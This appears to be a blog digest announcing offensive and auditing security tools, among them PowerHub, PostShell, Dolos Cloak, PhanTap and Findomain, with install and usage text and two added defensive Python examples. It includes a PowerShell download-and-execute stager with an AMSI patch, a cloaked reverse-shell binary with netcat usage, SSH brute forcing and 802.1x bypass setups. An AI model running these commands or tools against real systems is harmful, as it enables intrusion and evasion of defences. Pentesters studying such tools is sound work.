Manual Compilation

Make sure you are using Go >= 1.7, that your installation is working properly, that you have set the $GOPATH variable and you have appended $GOPATH/bin to your $PATH.

Then:

go get github.com/evilsocket/xray
cd $GOPATH/src/github.com/evilsocket/xray/
make

You'll find the executable in the build folder.

Usage

Usage: xray -shodan-key YOUR_SHODAN_API_KEY -domain TARGET_DOMAIN

Options:
  -address string
        IP address to bind the web ui server to. (default "127.0.0.1")
  -consumers int
        Number of concurrent consumers to use for subdomain enumeration. (default 16)
  -domain string
        Base domain to start enumeration from.
  -port int
        TCP port to bind the web ui server to. (default 8080)
  -preserve-domain
        Do not remove subdomain from the provided domain name.
  -session string
        Session file name. (default "<domain-name>-xray-session.json")
  -shodan-key string
        Shodan API key.
  -viewdns-key string
        ViewDNS API key.
  -wordlist string
        Wordlist file to use for enumeration. (default "wordlists/default.lst")

Example:

# xray -shodan-key yadayadayadapicaboo... -viewdns-key foobarsomethingsomething... -domain fbi.gov

____  ___
\   \/  /
 \     RAY v 1.0.0b
 /    by Simone 'evilsocket' Margaritelli
/___/\  \
      \_/

@ Saving session to fbi.gov-xray-session.json
@ Web UI running on http://127.0.0.1:8080/

Download XRay

Article link

Date of publish: Mon, 11 Nov 2019 09:53:00 +0000

Hacking for Dummies, 6th Edition ($29.99 Value) Free


"Hacking for Dummies, 6th Edition ($29.99 Value) Free for a Limited Time"

Stop hackers before they hack you!


In order to outsmart a would-be hacker, you need to get into the hacker’s mindset and with this book, thinking like a bad guy has never been easier. Get expert knowledge on penetration testing, vulnerability assessments, security best practices, and ethical hacking that is essential in order to stop a hacker in their tracks.

This no-nonsense book helps you learn how to recognize the vulnerabilities in your systems so you can safeguard them more diligently—with confidence and ease.
  • Get up to speed on Windows 10 hacks
  • Learn about the latest mobile computing hacks
  • Get free testing tools
  • Find out about new system updates and improvements

There’s no such thing as being too safe — and this resourceful guide helps ensure you’re protected.



Free offer expires 10/15/19

Offered Free by: Wiley

Article link

Date of publish: Mon, 14 Oct 2019 14:22:00 +0000

TraXSS - Automated XSS Vulnerability Scanner


  • Automated Vulnerability Scanner for XSS 
  • Written in Python3 


Traxss is an automated framework to scan URLs and webpages for XSS Vulnerabilities. It includes over 575 Payloads to test with and multiple options for robustness of tests.

Getting Started

Prerequisites
Traxss depends on Chromedriver. On MacOS this can be installed with the homebrew command:

brew install --cask chromedriver

Alternatively, find a version for other operating systems here: https://sites.google.com/a/chromium.org/chromedriver/downloads

Installation

Run the command:

pip3 install -r requirements.txt

Running Traxss
Traxss can be started with the command:

python3 traxss.py

This will launch an interactive CLI to guide you through the process.

Types of Scans

Full Scan with HTML

Uses a query scan with 575+ payloads and attempts to find XSS vulnerabilities by passing parameters through the URL. It will also render the HTML and attempt to find manual XSS vulnerabilities (this feature is still in beta).

Full Scan w/o HTML

This scan will run the query scan only.

Fast Scan with HTML

This scan is the same as the full w/ HTML but it will only use 7 attack vectors rather than the 575+ vectors.

Fast Scan w/o HTML

This scan is the same as the fast w/o HTML but it will only use 7 attack vectors rather than the 575+ vectors.

Contributing

Thank you for your interest! All types of contributions are welcome.
  • Fork and clone this repository
  • Create your branch from the master branch
  • Please open your PR with the master branch as the base

Download TraXSS

Article link

Date of publish: Mon, 14 Oct 2019 08:28:00 +0000

Penta- Open Source All-in-one CLI To Automate Pentesting


Penta (PENTest + Automation tool) is a pentest automation tool written in Python 3.

Installation

Install requirements
penta requires the following packages.
  • Python3.7
  • pipenv

Resolve python package dependency.

$ pipenv install

If you dislike pipenv..

$ pip install -r requirements.txt

Usage

$ pipenv run start <options>

If you dislike pipenv...

$ python penta/penta.py

Usage: List options

$ pipenv run start -h

usage: penta.py [-h] [-target TARGET] [-ports PORTS] [-proxy PROXY]

Penta is Pentest automation tool.

optional arguments:
  -h, --help      show this help message and exit
  -target TARGET  Specify target IP / domain
  -ports PORTS    Please, specify the target port(s) separated by comma.
                  Default: 21,22,25,80,110,443,8080
  -proxy PROXY    Proxy[IP:PORT]

Usage: Main menu

[ ] === MENU LIST =================================
[0] EXIT
[1] Port scanning Default: 21,22,25,80,110,443,8080
[2] Nmap & vuln scanning
[3] Check HTTP option methods
[4] Grab DNS server info
[5] Shodan host search
[6] FTP connect with anonymous
[7] SSH connect with Brute Force
[99] Change target host

1. Port scanning
To check ports for a target. Log output supported.

2. Nmap
To check ports by additional means using nmap

3. Check HTTP option methods
To check the methods (e.g. GET,POST) for a target.

4. Grab DNS server info
To show the info about DNS server.

5. Shodan host search
To collect host service info from Shodan. A Shodan API key is required to enable the feature.

6. FTP connect with anonymous
To check whether anonymous access is enabled on port 21. FTP users can authenticate using the plain-text sign-in protocol (typically a username and password), but they can connect anonymously if the server is configured to allow it.

Anyone can log in to the server if the administrator has allowed an FTP connection with an anonymous login.

7. SSH connect with Brute Force
To check the SSH connection by brute force. Dictionary data is in data/dict.

Download Now

Article link

Date of publish: Thu, 10 Oct 2019 18:57:00 +0000

Dolos Cloak- For Network Penetration Testers To Automated 802.1x Bypass




Dolos Cloak is a python script designed to help network penetration testers and red teamers bypass 802.1x solutions by using an advanced man-in-the-middle attack.

The script is able to piggyback on the wired connection of a victim device that is already allowed on the target network without kicking the victim device off the network. It was designed to run on an Odroid C2 running Kali ARM and requires two external USB ethernet dongles. It should be possible to run the script on other hardware and distros but it has only been tested on an Odroid C2 thus far.

How it Works

Dolos Cloak uses iptables, arptables, and ebtables NAT rules in order to spoof the MAC and IP addresses of a trusted network device and blend in with regular network traffic. On boot, the script disallows any outbound network traffic from leaving the Odroid in order to hide the MAC addresses of its network interfaces.

Next, the script creates a bridge interface and adds the two external USB ethernet dongles to the bridge. All traffic, including any 802.1x authentication steps, is passed on the bridge between these two interfaces.

In this state, the device is acting like a wire tap. Once the Odroid is plugged in between a trusted device (desktop, IP phone, printer, etc.) and the network, the script listens to the packets on the bridge interface in order to determine the MAC address and IP of the victim device.

Once the script determines the MAC address and IP of the victim device, it configures NAT rules in order to make all traffic on the OUTPUT and POSTROUTING chains look like it is coming from the victim device. At this point, the device is able to communicate with the network without being burned.

Once the Odroid is spoofing the MAC address and IP of the victim device, the script sends out a DHCP request in order to determine its default gateway, search domain, and name servers. It uses the response in order to configure its network settings so that the device can communicate with the rest of the network.

At this point, the Odroid is acting as a stealthy foothold on the network. Operators can connect to the Odroid over the built-in NIC eth0 in order to obtain network access. The device can also be configured to send out a reverse shell so that operators can utilize the device as a drop box and run commands on the network remotely.

For example, the script can be configured to run an Empire python stager after running the man-in-the-middle attack. You can then use the Empire C2 connection to upgrade to a TCP reverse shell or VPN tunnel.

Installation and Usage

  • Perform default install of Kali ARM on Odroid C2. 
ssh root@169.254.44.44
  • Be sure to save this project to /root/tools/dolos_cloak
  • Plug one external USB NIC into the Odroid and run dhclient to get internet access in order to install dependencies:
dhclient usbnet0
  • Run the install script to get all the dependencies and set the Odroid to perform the MitM on boot by default. Keep in mind that this will make drastic changes to the device's network settings and disable Network Manager. You may want to download any additional tools before this step:
cd setup
./setup.sh
  • You may want to install some other tools like 'host' that do not come standard on Kali ARM. Empire, enum4linux, and responder are also nice additions.
  • Make sure you are able to ssh into the Odroid via the built-in NIC eth0. Add your public key to /root/.ssh/authorized_keys for fast access.
  • Modify config.yaml to meet your needs. You should make sure the interfaces match the default names that your Odroid is giving your USB dongles. Order does not matter here. You should leave client_ip, client_mac, gateway_ip, and gateway_mac blank unless you used a LAN tap to mine them. The script should be able to figure this out for us. Set these options only if you know their values for sure. The management_int, domain_name, and dns_server options are placeholders for now but will be useful very soon. For shells, you can set up a custom autorun command in the config.yaml to run when the man-in-the-middle attack has autoconfigured. You can also set up a cron job to send back shells.
  • Connect two usb ethernet dongles and reboot the device (you need two because the built-in ethernet won't support promiscuous mode)
  • Boot the device and wait a few seconds for autosniff.py to block the OUTPUT ethernet and IP chains. Then plug in the Odroid between a trusted device and the network.
  • PWN N00BZ, get $$$, have fun, hack the planet

Tips

  • Mod and run ./scripts/upgrade_to_vpn.sh to turn a stealthy Empire agent into a full blown VPN tunnel
  • Mod and run ./scripts/reverse_listener_setup.sh to set up a port for a reverse listener on the device.
  • Run ./scripts/responder_setup.sh to allow control of the protocols that we capture for responder. You should run responder on the bridge interface:
responder -I mibr
  • Be careful, as some NAC solutions use ports 445, 443 and 80 to periodically verify hosts. Working on a solution to this.
  • Logs help when the autosniff.py misbehaves. The rc.local is set to store the current session logs in ./logs/session.log and logs in ./logs/history.log so we can reboot and still check the last session's log if need be. Log files have cool stuff in them like network info, error messages, and all bash commands to set up the NAT ninja magic.

Download Dolos Cloak

Article link

Date of publish: Mon, 23 Sep 2019 07:54:00 +0000

PostShell - Post Exploitation Bind/Backconnect Shell




PostShell is a post-exploitation shell that includes both a bind and a back connect shell. It creates a fully interactive TTY which allows for job control.

The stub size is around 14kb and can be compiled on any Unix like system. Banner and interaction with shell after a connection is started.

Why not use a traditional Backconnect/Bind Shell?

PostShell allows for easier post-exploitation by making the attacker less dependent on interpreters such as Python and Perl.

It also incorporates both a back connect and bind shell, meaning that if a target doesn't allow outgoing connections an operator can simply start a bind shell and connect to the machine remotely.

PostShell is also significantly less suspicious than a traditional shell due to the fact both the name of the processes and arguments are cloaked.

Features

  • Anti-Debugging, if ptrace is detected as being attached to the shell it will exit.
  • Process Name/Thread names are cloaked, a fake name overwrites all of the system arguments and file name to make it seem like a legitimate program.
  • TTY, a TTY is created which essentially allows for the same usage of the machine as if you were connected via SSH.
  • Bind/Backconnect shell, both a bind shell and back connect can be created.
  • Small Stub Size, a very small stub (<14kb) is usually generated.
  • Automatically Daemonizes
  • Tries to set GUID/UID to 0 (root)

Getting Started

  1. Downloading: git clone https://github.com/rek7/postshell
  2. Compiling: cd postshell && sh compile.sh. This should create a binary called "stub"; this is the malware.

Commands

$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$

Example Usage

Backconnect:

$ ./stub 127.0.0.1 13377

Bind Shell:

$ ./stub 13377

Receiving a Connection with Netcat


Receiving a backconnect:

$ nc -vlp port

Connecting to a bind Shell:

$ nc host port

TODO:

Add domain resolution

Download PostShell

Disclaimer: These scripts are for knowledge purposes only

Article link

Date of publish: Tue, 10 Sep 2019 06:31:00 +0000

Findomain- Fastest And Cross-platform Subdomain Enumerator



Comparison
This comparison gives you an idea of why you should use Findomain instead of other enumerators. The domain used for the test was Microsoft.com in the following BlackArch virtual machine:

Host: KVM/QEMU (Standard PC (i440FX + PIIX, 1996) pc-i440fx-3.1)
Kernel: 5.2.6-arch1-1-ARCH
CPU: Intel (Skylake, IBRS) (4) @ 2.904GHz
Memory: 139MiB / 3943MiB

The Linux time command was used to measure the search time.

You can see all the details of the tests at this link.


Enumeration Tool   Search Time (real)   Total Subdomains Found   CPU Usage   RAM Usage
Findomain          0m38.701s            5622                     Very Low    Very Low
assetfinder        6m1.117s             4630                     Very Low    Very Low
Subl1st3r          7m14.996s            996                      Low         Low
Amass*             29m20.301s           332                      Very High   Very High

I could not wait for the Amass test to finish; it looks like it will never end, and additionally its resource usage is very high.

Note: The benchmark was made on 10/08/2019; since then other software may have improved, and you may get different results.

Features

  • Discover sub-domains without brute-force, it uses Certificate Transparency Logs.
  • Discover sub-domains with or without IP address according to user arguments.
  • Read target from user argument (-t).
  • Read a list of targets from file and discover their sub-domains with or without IP and also write to output files per-domain if specified by the user, recursively.
  • Write output to TXT file.
  • Write output to CSV file.
  • Write output to JSON file.
  • Cross platform support: Any platform.
  • Optional multiple API support.
  • Proxy support.

Note: the proxy support only proxies the API requests. The IP address resolution of sub-domains does not support proxying and is done over the host network even if you use the -p option.

How it works?

This tool doesn't use the common methods for (sub)domain discovery. It uses Certificate Transparency logs to find sub-domains, and this method makes it the fastest and most reliable. The tool makes use of multiple publicly available APIs to perform the search. If you want to know more about Certificate Transparency logs, read https://www.certificate-transparency.org/

APIs used at the moment:
  • Certspotter: https://api.certspotter.com/
  • Crt.sh : https://crt.sh
  • Virustotal: https://www.virustotal.com/ui/domains/
  • Sublit3r: https://api.sublist3r.com/
  • Facebook: https://developers.facebook.com/docs/certificate-transparency

If you know of another that should be added, open an issue.
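The CT-log method described above, as an added example that is not Findomain's own code: it pulls hostnames out of crt.sh-style JSON records, normalises wildcard and mixed-case names, drops names outside the target zone, and diffs the result against an asset inventory so a defender can spot certificates issued for hosts they did not know about. The records, the target domain and the inventory are constructed for the example.

```python
"""Extract unique subdomains from Certificate Transparency search results.

Added example, not Findomain's own code: it applies the method described
above (subdomain discovery from CT logs instead of brute force) to JSON
records in the shape crt.sh returns. The records below are constructed to
cover the cases a real response contains: one certificate listing several
names, wildcard entries, mixed case, duplicates and an off-target name.
"""
import json

# Constructed sample in the shape of https://crt.sh/?q=%25.example.com&output=json
SAMPLE_CRTSH_JSON = json.dumps([
    {"common_name": "www.example.com",
     "name_value": "www.example.com\nexample.com",
     "not_before": "2019-08-01T00:00:00"},
    {"common_name": "*.dev.example.com",
     "name_value": "*.dev.example.com\napi.dev.example.com",
     "not_before": "2019-08-05T00:00:00"},
    {"common_name": "MAIL.Example.COM",       # mixed case, must be normalised
     "name_value": "MAIL.Example.COM.",
     "not_before": "2019-08-10T00:00:00"},
    {"common_name": "example.com.evil.test",  # off-target: matches as substring only
     "name_value": "example.com.evil.test",
     "not_before": "2019-08-12T00:00:00"},
    {"common_name": "www.example.com",        # duplicate of the first record
     "name_value": "www.example.com",
     "not_before": "2019-08-15T00:00:00"},
])


def normalize_hostname(name, target):
    """Canonicalise one certificate name; return None if it is not under target."""
    host = name.strip().lower().rstrip(".")
    if host.startswith("*."):
        host = host[2:]  # a wildcard cert still tells you the parent label exists
    if host == target or host.endswith("." + target):
        return host
    return None


def extract_subdomains(crtsh_json, target):
    """Return the sorted, de-duplicated hostnames under target found in CT records."""
    target = target.strip().lower().rstrip(".")
    found = set()
    for entry in json.loads(crtsh_json):
        # name_value carries every SAN on the cert, newline-separated;
        # common_name is included too since older certs may lack SANs.
        names = entry.get("name_value", "").split("\n")
        names.append(entry.get("common_name", ""))
        for name in names:
            host = normalize_hostname(name, target)
            if host is not None:
                found.add(host)
    return sorted(found)


def unknown_hosts(discovered, inventory):
    """Defender's view: CT-discovered names that are absent from the asset inventory."""
    known = {h.lower().rstrip(".") for h in inventory}
    return sorted(h for h in discovered if h not in known)


if __name__ == "__main__":
    hosts = extract_subdomains(SAMPLE_CRTSH_JSON, "example.com")
    print("discovered:", hosts)
    print("not in inventory:", unknown_hosts(hosts, {"www.example.com", "example.com"}))
```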

Supported platforms in our binary releases

All the binaries that we provide are 64-bit only, and we have no plans to add 32-bit binary releases; if you need 32-bit support, follow the documentation.
  • Linux
  • Windows
  • MacOS
  • ARM
  • Aarch64 (Raspberry Pi)

Build for 32 bits or another platform

If you want to build the tool for your 32-bit system or another platform, follow these steps:

Note: You need to have rust, make and perl installed in your system first.

Using the Github source code:
  • Clone the repository or download the release source code.
  • Extract the release source code (only needed if you downloaded the compressed file).
  • Go to the folder where the source code is.
  • Execute cargo build --release
  • Now your binary is in target/release/findomain and you can use it.

Installation Android (Termux)

Install the Termux package, open it and run these commands:

$ pkg install rust make perl
$ cargo install findomain
$ cd $HOME/.cargo/bin
$ ./findomain

Installation in Linux using source code

If you want to install it, you can do that either by manually compiling the source or by using the precompiled binary.

Manually: you need to have rust, make and perl installed on your system first.

$ git clone https://github.com/Edu4rdSHL/findomain.git
$ cd findomain
$ cargo build --release
$ sudo cp target/release/findomain /usr/bin/
$ findomain

Installation in Linux using compiled artifacts

$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux
$ chmod +x findomain-linux
$ ./findomain-linux

If you are using the BlackArch Linux distribution, you just need to use:

$ sudo pacman -S findomain


Installation ARM

$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-arm
$ chmod +x findomain-arm
$ ./findomain-arm

Installation Aarch64 (Raspberry Pi)

$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-aarch64
$ chmod +x findomain-aarch64
$ ./findomain-aarch64

Installation Windows

Download the binary from 
https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-windows.exe

Open a CMD shell and go to the dir where findomain-windows.exe was downloaded.

Exec: findomain-windows in the CMD shell.

Installation MacOS

$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-osx
$ chmod +x findomain-osx
$ ./findomain-osx

Usage

You can use the tool in two ways, only discovering the domain name or discovering the domain + the IP address.

findomain 0.2.0
Eduard Tolosa <tolosaeduard@gmail.com>
A tool that use Certificates Transparency logs to find subdomains.

USAGE:
    findomain [FLAGS] [OPTIONS]

FLAGS:
    -a, --all-apis    Use all the available APIs to perform the search. It take more time but you will have a lot of
                      more results.
    -h, --help        Prints help information
    -i, --get-ip      Return the subdomain list with IP address if resolved.
    -V, --version     Prints version information

OPTIONS:
    -f, --file <file>        Sets the input file to use.
    -o, --output <output>    Write data to output file in the specified format. [possible values: txt, csv, json]
    -p, --proxy <proxy>      Use a proxy to make the requests to the APIs.
    -t, --target <target>    Target host


Examples

Make a simple search of subdomains and print the info in the screen:
findomain -t example.com

Make a simple search of subdomains using all the APIs and print the info in the screen:
findomain -t example.com -a

Make a search of subdomains and export the data to a CSV file:
findomain -t example.com -o csv

Make a search of subdomains using all the APIs and export the data to a CSV file:
findomain -t example.com -a -o csv

Make a search of subdomains and resolve the IP address of subdomains (if possible):
findomain -t example.com -i

Make a search of subdomains with all the APIs and resolve the IP address of subdomains (if possible):
findomain -t example.com -i -a

Make a search of subdomains with all the APIs and resolve the IP address of subdomains (if possible), exporting the data to a CSV file:
findomain -t example.com -i -a -o csv

Make a search of subdomains using a proxy (http://127.0.0.1:8080 in this case; the rest of the arguments keep working in the same way, you just need to add the -p flag to the commands above):
findomain -t example.com -p http://127.0.0.1:8080

Download FinDomain

Article link

Date of publish: Sat, 24 Aug 2019 08:56:00 +0000

Burp Suite Extension - To Monitor And Keep Track of Tested Endpoints


Burp Scope Monitor Extension

A Burp Suite Extension to monitor and keep track of tested endpoints.


Main Features


  • Simple, easy way to keep track of unique endpoints when testing an application
  • Mark individual endpoints as analyzed or not
  • Instantly understand when a new endpoint, not tested is requested
  • Accessible from Proxy tab (right click, mark request as analyzed/not)
  • Send to Repeater
  • Enforcement of Burp's in scope rules
  • Import/Export state file directly to a CSV file for
  • Autosave option


Installation


  1. Make sure you have Jython configured under Extender -> Options -> Python Environment. For further instructions, check PortSwigger official instructions at their support page.
  2. git clone git@github.com:Regala/burp-scope-monitor.git
  3. Import main.py in Extender - Extender -> Extensions -> Add -> Select Python -> Select main.py


Documentation

Most of the options available in the General or Import tabs are self-explanatory.


  • "Repeater request automatically marks as analyzed" - when issuing a request to an endpoint from repeater, it marks this request as analyzed automatically.
  • "Color request in Proxy tab" - this essentially applies the behavior of the extension in the Proxy tab, if you combine this option with "Show only highlighted items" in Proxy. However, it's not as pleasant to the eyes, as the color palette is limited.
  • "Autosave periodically" - backs up the state file every 10 minutes. When activating this option, consider disabling "Autostart Scope Monitor". This is in order to maintain a different state file per Burp project. However, you can easily maintain only one master state file.
  • "Import/Export" is dedicated to handling the saved state files. It's preferred to open the Burp project file associated with the Scope Monitor. It will still work if the Burp project is different, but when loading the saved entries, you won't be able to send them to Repeater or view the request itself in the Request/Response viewer (this is because we are not storing the actual requests, just the endpoint, its analyzed status and a couple of other fields, which makes it a little more efficient).

Future Development


  • Keep track of parameters observed in all requests
  • Highlight when a new parameter was used in an already observed/analyzed endpoint
  • Export to spreadsheet / Google Sheets
  • Adding notes to the endpoint

Implementation

The code is not yet performant, optimized or anything similar. KISS and it works. Performance will be increased depending on demand and how the extension performs when handling large Burp projects.

To circumvent some of Burp's Extender API limitations, some small hacks were implemented. One of those is automatically setting a comment on the requests that flow in the Proxy tab.

You can still add comments on the items, as you normally would, but make sure to keep the placeholder string (scope-monitor-placeholder) there.

Hopefully in the future each requestResponse from Burp will have a unique identifier, which would make the import state / load from file much cleaner and fast. With large state files, this might hang a bit when loading.

Download Burp Scope Monitor 

Article link

Date of publish: Wed, 21 Aug 2019 11:45:00 +0000

Slurp - S3 Bucket Enumerator for Security Audits


Slurp- Blackbox/Whitebox S3 Bucket Enumerator

A tool to evaluate the security of S3 buckets


Overview

  • Credit to all the vendored packages that made developing Slurp possible.
  • Slurp is for pen-testers and security professionals to perform audits of s3 buckets.

Features

  • Scan via domain(s); you can target a single domain or a list of domains
  • Scan via keyword(s); you can target a single keyword or a list of keywords
  • Scan via AWS credentials; you can target your own AWS account to see which buckets have been exposed
  • Colorized output for visual grep
  • Currently generates over 28,000 permutations per domain and keyword (thanks to @jakewarren and @random-robbie)
  • Punycode support for internationalized domains
  • Strong copyleft license (GPLv3)

Modes

There are two modes that this tool operates in: blackbox and whitebox mode. Whitebox mode (or internal) is significantly faster than blackbox (external) mode.

Blackbox (external)

In this mode, you are using the permutations list to conduct scans. It will return false positives and there is no way to link the buckets to an actual AWS account! Do not open issues asking how to do this.

Domain


Keywords


Whitebox (internal)

In this mode, you are using the AWS API with credentials on a specific account that you own to see what is open. This method pulls all S3 buckets and checks Policy/ACL permissions. Note that I will not provide support on how to use the AWS API.

Your credentials should be in ~/.aws/credentials.
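The whitebox check described above has to decide, for each bucket the AWS API returns, whether its policy or its ACL grants access to everyone. The following is an added Python example (not Slurp's own Go code) that makes that decision offline on policy and ACL documents in the shape the S3 API returns them. The documents, the OWNER-ID-PLACEHOLDER canonical user ID and the vpce-PLACEHOLDER endpoint ID are constructed samples; the two global group URIs are the real S3 group identifiers.

```python
"""Offline classification of S3 bucket policy and ACL documents.

Added example, not Slurp's code: it makes the same decision a whitebox
scan has to make after fetching a bucket's Policy and ACL through the
AWS API. All documents below are constructed samples; OWNER-ID-PLACEHOLDER
and vpce-PLACEHOLDER stand in for real IDs.
"""

# Predefined S3 groups that make an ACL grant public.
ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTH_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
PUBLIC_GROUPS = {ALL_USERS: "AllUsers", AUTH_USERS: "AuthenticatedUsers"}


def _as_list(value):
    """Policy fields such as Action or Principal.AWS may be a string or a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _principal_is_everyone(principal):
    """True when a statement's Principal is "*" or {"AWS": "*"}."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS"))
    return False


def policy_findings(policy):
    """One finding per Allow statement whose principal is everyone.

    Statements carrying a Condition block are reported as
    "conditional-public": the condition (for example aws:SourceVpce)
    may narrow the grant, so they need a human look rather than an
    automatic PUBLIC verdict. Deny statements are not evaluated here.
    """
    findings = []
    if not policy:
        return findings
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        if not _principal_is_everyone(stmt.get("Principal")):
            continue
        findings.append({
            "source": "policy",
            "kind": "conditional-public" if stmt.get("Condition") else "public",
            "sid": stmt.get("Sid", ""),
            "actions": _as_list(stmt.get("Action")),
        })
    return findings


def acl_findings(grants):
    """One finding per ACL grant to AllUsers or AuthenticatedUsers."""
    findings = []
    for grant in grants:
        grantee = grant.get("Grantee", {})
        uri = grantee.get("URI")
        if grantee.get("Type") == "Group" and uri in PUBLIC_GROUPS:
            findings.append({
                "source": "acl",
                "kind": "public",
                "group": PUBLIC_GROUPS[uri],
                "permission": grant.get("Permission"),
            })
    return findings


def classify_bucket(policy, grants):
    """Combine policy and ACL findings into PUBLIC, CONDITIONAL or PRIVATE."""
    findings = policy_findings(policy) + acl_findings(grants)
    if any(f["kind"] == "public" for f in findings):
        verdict = "PUBLIC"
    elif findings:
        verdict = "CONDITIONAL"
    else:
        verdict = "PRIVATE"
    return {"verdict": verdict, "findings": findings}


# Constructed samples in the shape returned by get_bucket_policy / get_bucket_acl.
OWNER_GRANT = {"Grantee": {"Type": "CanonicalUser", "ID": "OWNER-ID-PLACEHOLDER"},
               "Permission": "FULL_CONTROL"}
SAMPLE_OWNER_ACL = [OWNER_GRANT]
SAMPLE_PUBLIC_ACL = [OWNER_GRANT,
                     {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"}]
SAMPLE_PUBLIC_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
                   "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"}],
}
SAMPLE_CONDITIONAL_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Sid": "VpceOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
                   "Action": ["s3:GetObject", "s3:ListBucket"],
                   "Resource": ["arn:aws:s3:::example-bucket", "arn:aws:s3:::example-bucket/*"],
                   "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-PLACEHOLDER"}}}],
}

if __name__ == "__main__":
    for name, policy, acl in [("public-bucket", SAMPLE_PUBLIC_POLICY, SAMPLE_PUBLIC_ACL),
                              ("vpce-bucket", SAMPLE_CONDITIONAL_POLICY, SAMPLE_OWNER_ACL),
                              ("private-bucket", None, SAMPLE_OWNER_ACL)]:
        result = classify_bucket(policy, acl)
        print(f"{name}: {result['verdict']} ({len(result['findings'])} finding(s))")
```

The verdict deliberately separates unconditional grants from grants guarded by a Condition block, because a bucket that is only reachable through a VPC endpoint is a different risk from one readable by the whole Internet; account-level Block Public Access settings and Deny statements are not modelled here, so a PUBLIC verdict is a candidate to confirm, not a proof of exposure.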

Internal



Usage

  • slurp domain <-t|--target> example.com will enumerate the S3 domains for a specific target.
  • slurp keyword <-t|--target> linux,golang,python will enumerate S3 buckets based on those 3 keywords.
  • slurp internal performs an internal scan using the AWS API.

Installation

This project uses vgo; you can clone and go build or download from the Releases section.

Please do not open issues on why you cannot build the project; this project builds like any other project would in Go, and if you cannot build it then I strongly suggest you read the Go spec.

Also, the only binaries I'm including are linux/amd64; if you want mac/windows binaries, build them yourself.

Download Slurp

Article link

Date of publish: Wed, 07 Aug 2019 21:47:00 +0000

PowerHub- A Post Exploitation Suite To Bypass Endpoint Protection


PowerHub is a convenient post exploitation tool which aids a pentester in transferring files, in particular code which may get flagged by endpoint protection.


During an engagement where you have a test client available, one of the first things you want to do is run PowerSploit. So you need to download the files, mess with endpoint protection, disable the execution policy, etc.

PowerHub provides an (almost) one-click solution for this. Oh, and you can also run arbitrary binaries (PE and shell code) entirely in-memory using PowerSploit's modules, which is sometimes useful to bypass application whitelisting.

Your loot (Kerberos tickets, passwords, etc.) can be easily transferred back either as a file or a text snippet, via the command line or the web interface. PowerHub also helps with collaboration in case you're a small team.

On top of that, PowerHub comes with a reverse PowerShell, making it suitable for any kind of post-exploitation action.

Here is a simple example (grab information about local groups with PowerView and transfer it back):

PS C:\Users\avollmer> $K=new-object net.webclient;IEX $K.downloadstring('http://192.168.11.2:8000/0');
  _____   _____  _  _  _ _______  ______ _     _ _     _ ______
 |_____] |     | |  |  | |______ |_____/ |_____| |     | |_____]
 |       |_____| |__|__| |______ |    \_ |     | |_____| |_____]
                            written by Adrian Vollmer, 2018-2019
Run 'Help-PowerHub' for help
AmsiScanBuffer patch has been applied.
0
PS C:\Users\avollmer> lhm powerview
[*] /ps1/PowerSploit/Recon/PowerView.ps1 imported.
PS C:\Users\avollmer> Get-LocalGroup | pth -Name groups.json


Installation

PowerHub itself does not need to be installed. Just execute powerhub.py. However, there are a few dependencies. They are listed in the requirements.txt. Install them either via pip3 install --user -r requirements.txt or use a virtual environment:

Run python3 -m venv env to create a virtual environment, then use source env/bin/activate to activate it. Now run pip3 install -r requirements.txt to install the dependencies inside the virtual environment.

Python2 is not supported.

Usage

PowerHub has one mandatory argument: the callback host (can be an IP address). You should also use --auth <user>:<pass>, otherwise, a randomly generated password will be used for basic authentication.

The switch --no-auth disables basic authentication, which is not recommended. The callback host name is used by the stager to download the payload. If the callback port or path differ from the default, they can also be changed.

Read ./powerhub.py --help and the Wiki for details.

Download PowerHub

Article link

Date of publish: Wed, 07 Aug 2019 21:15:00 +0000

Phantom Tap (PhanTap) - An ‘Invisible’ Network Tap


Phantom Tap (PhanTap) - An ‘Invisible’ Network Tap Aimed at Red Teams.



With limited physical access to a target building, this tap can be installed inline between a network device and the corporate network.


PhanTap is silent in the network and does not affect the victim’s traffic, even in networks having NAC (Network Access Control 802.1X - 2004). PhanTap will analyze traffic on the network and mask its traffic as the victim device.

It can mount a tunnel back to a remote server, giving the user a foothold in the network for further analysis and pivoting. PhanTap is an OpenWrt package and should be compatible with any device. The physical device used for our testing is currently a small, inexpensive router, the GL.iNet GL-AR150.

Features:

  • Transparent network bridge.
  • Silent: no ARP, multicast or broadcast.
  • 802.1x passthrough.
  • Automatic configuration:
      • Capture traffic exiting the network (the destination is non-RFC1918); the source IP and MAC are our victim's, the destination MAC is our gateway's.
      • SNAT bridge traffic to the victim's MAC and IP address.
      • Set the router's default gateway to the MAC of the gateway detected just before.

  • Introspects ARP, multicast and broadcast traffic and adds a route to the machine IP address and adds the machine MAC address to the neighbor list, hence giving the possibility of talking to all the machines in the local network.
  • Learns the DNS server from traffic and modifies the one on the router so that it's the same.
  • Can run commands (ex: /etc/init.d/openvpn restart) when a new IP or DNS is configured.
  • Lets you choose any VPN software, for example OpenVPN on TCP port 443 so it goes through most firewalls.
  • You can talk to the victim machine (using the gateway IP).

Setup

PhanTap has been tested with the GL.iNet GL-AR150. This device has two separate network interfaces in OpenWrt (eth0, eth1).

If your device is using an internal switch (swconfig based) with interfaces like eth0.1, eth0.2, some special traffic might be blocked, e.g. 802.1Q (tagged vlan), but PhanTap should work.
  • Install a snapshot build for the GL.iNet GL-AR150
  • Update the OpenWrt package list
opkg update
  • Install PhanTap package:
opkg install phantap phantap-learn
  • Configure the Wi-Fi and start administering the router through it.
  • Either reboot the device, or run /etc/init.d/phantap setup.
